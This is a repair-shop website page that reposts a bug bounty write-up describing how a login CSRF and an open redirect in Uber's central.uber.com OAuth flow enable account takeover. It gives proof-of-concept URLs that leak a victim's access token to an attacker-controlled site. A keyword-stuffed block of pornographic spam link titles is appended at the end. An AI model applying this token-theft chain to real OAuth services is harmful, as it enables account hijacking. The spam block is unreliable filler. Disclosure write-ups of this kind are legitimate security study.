錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務,錦州廣廈維修電腦,公司IT外包服務
topFlag1 設為首頁
topFlag3 收藏本站
 
maojin003 首 頁 公司介紹 服務項目 服務報價 維修流程 IT外包服務 服務器維護 技術文章 常見故障
錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務技術文章
我如何挖到了一個價值8000美金的Uber漏洞

作者: 佚名  日期:2017-07-10 17:49:19   來源: 本站整理

 我研究Uber漏洞已經有一段時間了,而這是我第一次發布關于Uber漏洞挖掘的報告,希望可以給大家提供一些有趣的挖洞思路。在這篇文章中,我將會跟大家分享一個我在Uber系統中發現的有趣漏洞(Login CSRF + 開放重定向 -> 賬戶接管)。


長話短說
這個漏洞存在于Uber的central.uber.com節點,它使用了OAuth 2.0協議作為其登錄授權機制,但該節點并沒有正確使用CSRF參數,這將導致攻擊者能夠利用這種錯誤使用的狀態參數來執行開放重定向以及Login CSRF,然后在實現重定向之后竊取URL哈希中的訪問令牌。
central.uber.com的登錄流程
首先大家要了解central.uber.com的登錄流程(修復前),當用戶點擊了central.uber.com頁面中的登錄按鈕之后,系統的運行機制和跳轉如下:
1. https://central.uber.com/login?state=/somewhere
2. https://login.uber.com/oauth/authorize?response_type=code&scope=profile%20history&client_id=bOYt8vYWpnAacUZt9ng2LILDXnV-BAj4&redirect_uri=https%3A%2F%2Fcentral.uber.com%2Foauth2-callback&state=%2Fsomewhere
3. https://central.uber.com/oauth2-callback?state=%2F&code=it53JtFe6BPGH1arCLxQ6InrT4MXdd
4. https://central.uber.com/somewhere
注:如果你想充分理解這個漏洞的話,你首先必須要清楚該節點所采用的用戶登錄流程,所以請各位多花點時間好好看看上面給出的跳轉鏈接。
當我看到了整個登錄流程之后,我首先想到的攻擊方法是將狀態參數/somewhere修改為//google.com來實現一次可能的開放重定向。修改之后的登錄流程如下:
1.  https://central.uber.com/login?state=//google.com
2.  https://login.uber.com/oauth/authorize?response_type=code&scope=profile%20history&client_id=bOYt8vYWpnAacUZt9ng2LILDXnV-BAj4&redirect_uri=https%3A%2F%2Fcentral.uber.com%2Foauth2-callback&state=%2F%2fgoogle.com
3.  https://central.uber.com/oauth2-callback?state=%2F%2fgoogle.com&code=it53JtFe6BPGH1arCLxQ6InrT4MXdd
4.  //google.com 
果然不出我所料,我成功地將這個登錄流程變成了一個開放重定向漏洞,但Uber并不接受關于開放重定向漏洞的報告,所以我還得想辦法通過這個漏洞找到其他更有意思的漏洞。但不管怎么樣,這仍然是一個非常好的開端。
由于Oauth請求使用的是code而并非token,所以即便是我們找到了一個開放重定向漏洞,我們也仍然無法利用它來竊取到任何信息。那如果我們將請求所使用的code轉換為token的話,又會發生什么呢?
1.  https://login.uber.com/oauth/authorize?response_type=token&scope=profile%20history&client_id=bOYt8vYWpnAacUZt9ng2LILDXnV-BAj4&redirect_uri=https%3A%2F%2Fcentral.uber.com%2Foauth2-callback&state=%2F%2fgoogle.com
2.  https://central.uber.com/oauth2-callback?state=%2F%2fgoogle.com#access_token=xxxxx
3.  無法實現重定向
由于我們這里沒有給https://central.uber.com/oauth2-callback提供有效的code值,所以在上述的第2步之后才沒能實現重定向。如果無法實現重定向,那我們就沒辦法竊取到訪問令牌了。所以我們得想辦法解決這個問題,我們需要一個針對oauth2-callback節點的有效code值。
Login CSRF
在這種情況下,Login CSRF就要派上用場了。由于這個Uber節點會在重定向時使用 CSRF參數狀態,所以我們可以直接將攻擊者的有效OAuth code添加到oauth2-callback節點,然后將其發送給目標用戶。當用戶訪問了這條鏈接之后,就可以被正確地重定向到攻擊者所控制的頁面并泄露其訪問令牌。
限制
利用這個漏洞時唯一的要求就是目標用戶的瀏覽器中已經存儲了login.uber.com的身份認證會話信息(session)。由于central.uber.com是Uber的官方OAuth客戶端,所以每一位Uber用戶默認都會接受central.uber.com的請求。
概念驗證PoC
PoC
https://login.uber.com/oauth/authorize?response_type=token&scope=profile%20history%20places%20ride_widgets%20request%20request_receipt%20all_trips&client_id=bOYt8vYWpnAacUZt9ng2LILDXnV-BAj4&redirect_uri=https%3A%2F%2Fcentral.uber.com%2Foauth2-callback%3fcode%3d攻擊者的有效OAuth code&state=%2F%2f攻擊者控制的站點
PoC登錄流程
1.https://login.uber.com/oauth/authorize?response_type=token&scope=profile%20history%20places%20ride_widgets%20request%20request_receipt%20all_trips&client_id=bOYt8vYWpnAacUZt9ng2LILDXnV-BAj4&redirect_uri=https%3A%2F%2Fcentral.uber.com%2Foauth2-callback%3fcode%3d{攻擊者的有效OAuth code}&state=%2F%2f攻擊者控制的站點
2.https://central.uber.com/oauth2-callback?state=%2F%2fhackerone.com&code={攻擊者的有效OAuth code}#access_token={目標用戶的訪問令牌}
3.//hackerone.com#accesstoken={目標用戶的訪問令牌}
總結
終于搞定啦!我已經將這個漏洞上報給了Uber的安全技術團隊,Uber也在確認了漏洞信息之后給我提供了8000美刀的漏洞獎勵。
感謝大家的閱讀,如果你有什么其他的觀點或想法,請趕緊與我聯系吧!281936@qq.com
 

0


熱門文章
  • 機械革命S1 PRO-02 開機不顯示 黑...
  • 聯想ThinkPad NM-C641上電掉電點不...
  • 三星一體激光打印機SCX-4521F維修...
  • 通過串口命令查看EMMC擦寫次數和判...
  • IIS 8 開啟 GZIP壓縮來減少網絡請求...
  • 索尼kd-49x7500e背光一半暗且閃爍 ...
  • 樓宇對講門禁讀卡異常維修,讀卡芯...
  • 新款海信電視機始終停留在開機界面...
  • 常見打印機清零步驟
  • 安裝驅動時提示不包含數字簽名的解...
  • 共享打印機需要密碼的解決方法
  • 圖解Windows 7系統快速共享打印機的...
  • 錦州廣廈電腦上門維修

    報修電話:13840665804  QQ:174984393 (聯系人:毛先生)   
    E-Mail:174984393@qq.com
    維修中心地址:錦州廣廈電腦城
    ICP備案/許可證號:遼ICP備2023002984號-1
    上門服務區域: 遼寧錦州市區
    主要業務: 修電腦,電腦修理,電腦維護,上門維修電腦,黑屏藍屏死機故障排除,無線上網設置,IT服務外包,局域網組建,ADSL共享上網,路由器設置,數據恢復,密碼破解,光盤刻錄制作等服務

    技術支持:微軟等
    主站蜘蛛池模板: 亚洲精品无码久久久久久久| 日韩综合无码一区二区| 在线观看无码AV网址| 中文字幕无码播放免费| 亚洲AV中文无码乱人伦| 亚洲熟妇无码爱v在线观看| 成在人线AV无码免费| 亚洲国产精品无码成人片久久| 亚洲av纯肉无码精品动漫| 亚洲综合无码AV一区二区| 午夜无码熟熟妇丰满人妻| 无码人妻精品一区二区三| 白嫩无码人妻丰满熟妇啪啪区百度| 久久无码av三级| 国产精品无码素人福利| 国产精品无码一区二区三区毛片 | 精品国产V无码大片在线看| 无码毛片一区二区三区视频免费播放| 国产成人午夜无码电影在线观看| 在线无码午夜福利高潮视频 | 在线看片无码永久免费aⅴ| 无码精品A∨在线观看| 成人无码午夜在线观看| 人妻丰满熟妇A v无码区不卡 | 日韩精品无码区免费专区| 无码人妻久久久一区二区三区| 无码人妻精品一区二区蜜桃百度| 亚洲成在人线在线播放无码 | 人妻无码一区二区三区免费| 本道天堂成在人线av无码免费| 无码里番纯肉h在线网站| 无码无需播放器在线观看| 亚洲精品av无码喷奶水糖心| 亚洲AV无码成人网站久久精品大| 无码国产69精品久久久久网站| 无码中文人妻在线一区| 国产AV无码专区亚洲AV毛网站 | 毛片无码免费无码播放| 国产在线无码不卡影视影院| 免费无码国产V片在线观看| 国内精品久久久久久无码不卡|